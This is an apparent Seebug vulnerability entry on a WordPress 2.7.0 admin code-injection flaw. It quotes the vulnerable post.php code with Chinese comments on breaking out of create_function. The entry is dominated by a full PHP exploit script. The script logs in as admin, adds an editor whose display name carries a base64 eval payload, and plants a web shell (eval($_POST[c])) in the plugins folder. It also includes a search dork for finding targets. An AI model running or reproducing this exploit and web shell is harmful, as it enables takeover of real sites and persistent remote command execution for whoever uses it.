Wordpress 2.7.0 admin remote code execution vulnerability

2009-01-12T00:00:00
ID SSV:4656
Type seebug
Reporter Root
Modified 2009-01-12T00:00:00

Description

这个漏洞出在后台:(

wp-admin/post.php

if ( current_user_can('edit_post', $post_ID) ) {
    if ( $last = wp_check_post_lock( $post->ID ) ) {
        $last_user = get_userdata( $last );
        $last_user_name = $last_user ? $last_user->display_name : __('Somebody');
        $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
        $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
        //提交\'经过此处代码处理后变为\\' :)
        add_action('admin_notices', create_function( '', "echo '$message';" ) );
        //利用上面的方法闭合echo后面的单引号,就可以执行命令了[ex:\';phpinfo();\'];另外这个地方也可以利用create_function函数自身的一个bug[1]来执行命令[ex:\';}phpinfo();//]
    } else {
        wp_set_post_lock( $post->ID );
        wp_enqueue_script('autosave');
    }
}

Wordpress 2.7.0 暂无

                                        
                                            
                                                #!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Wordpress 2.7.0 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
site: http://www.80vul.com
dork: "powered by WordPress"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 6) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path user pass post
host:      target server (ip/hostname)
path:      path to wordpress
user:      admin login username
pass:      admin login password
post:      the available post id
Example:
php '.$argv[0].' localhost /wp/ admin 123456 1
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
$pass = $argv[4];
$post = $argv[5];

$shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
//$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
$shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
/**
 * wolvez.php has this code:
 * <?eval($_POST[c])?>
 */
$url = $path.'wp-login.php';
$cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);

if (!$admin_cookie)
    exit("Exploit Failed!\n");
    
$url = $path.'wp-admin/user-new.php#add-new-user';
$cmd = '';
$resp = send($admin_cookie[1]);
preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);

if (!$_wpnonce)
    exit("Exploit Failed!\n");

$cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
$resp = send($admin_cookie[1]);

if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)
    exit("Exploit Failed!\n");

$url = $path.'wp-login.php';
$cmd = 'log=ryat&pwd=123456';
$resp = send();
preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);

if (!$editor_cookie)
    exit("Exploit Failed!\n");

$url = $path.'wp-admin/post.php?action=edit&post='.$post;
$cmd = '';
send($editor_cookie[1]);
send($admin_cookie[1]);

if (strpos(file_get_contents($shell), 'puret_t') !== false)
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit("Exploit Failed!\n");

function send($cookie = '')
{
    global $host, $path, $url, $cmd;

    $data = "POST $url  HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Referer: http://$host$path\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "Cookie: $cookie\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>